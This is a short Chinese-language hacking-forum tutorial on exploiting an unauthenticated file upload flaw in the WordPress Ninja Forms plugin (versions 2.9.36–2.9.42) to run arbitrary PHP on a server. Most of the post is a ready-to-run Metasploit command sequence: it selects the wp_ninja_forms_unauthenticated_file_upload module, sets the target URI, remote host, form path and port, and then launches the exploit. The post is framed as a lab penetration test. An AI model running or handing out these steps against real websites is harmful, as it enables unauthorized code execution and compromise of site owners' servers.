渗透测试实战教程：利用WordPress插件Ninja Forms的文件上传漏洞进行渗透测试-渗透测试教程「文件上传漏洞,ninjaforms思路-文件上传漏洞,ninjaforms方法-文件上传漏洞,ninjaforms工具-文件上传漏洞,ninjaforms教程」蚁安黑客论坛-第1页

Ninja Forms插件的2.9.36到2.9.42版包含一个未经身份验证的文件上传漏洞，允许访客上传可在Web服务器上下文中执行的任意PHP代码。
利用目标
忍者形成2.9.36
需求
攻击者：kali Linux
受害者PC：wordpress
打开Kali终端类型 msfconsole

现在输入 exploit use / unix / webapp / wp_ninja_forms_unauthenticated_file_upload
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit

本文标题：渗透测试实战教程：利用WordPress插件Ninja Forms的文件上传漏洞进行渗透测试
本文作者：zevseo
本文来自：蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2323.html

渗透测试实战教程：利用WordPress插件Ninja Forms的文件上传漏洞进行渗透测试

热门话题

黑客教程

蚁安蚂蚁堆